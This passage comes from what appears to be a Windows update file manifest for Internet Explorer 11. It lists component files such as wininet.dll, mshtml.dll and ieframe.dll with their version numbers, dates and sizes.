13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:30| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:30| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 230,912 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 4,388,352 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 18:11| 333,312 \ninstall.ins| Not versioned| 12-Feb-2021| 16:25| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 710,656 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 20:55| 489,472 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:36| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 4,096 \nF12.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.18939| 10-Feb-2018| 9:17| 10,948,096 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:40| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nieetwcollector.exe| 11.0.9600.18666| 16-Apr-2017| 0:47| 104,960 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 2:19| 4,096 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.19846| 23-Sep-2020| 20:01| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 19:58| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 19:58| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 19:58| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 19:58| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:36| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 12-Feb-2021| 19:49| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:35| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:18| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:19| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 2,308,096 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:11| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:32| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:09| 13,881,856 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:40| 24,486 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:38| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 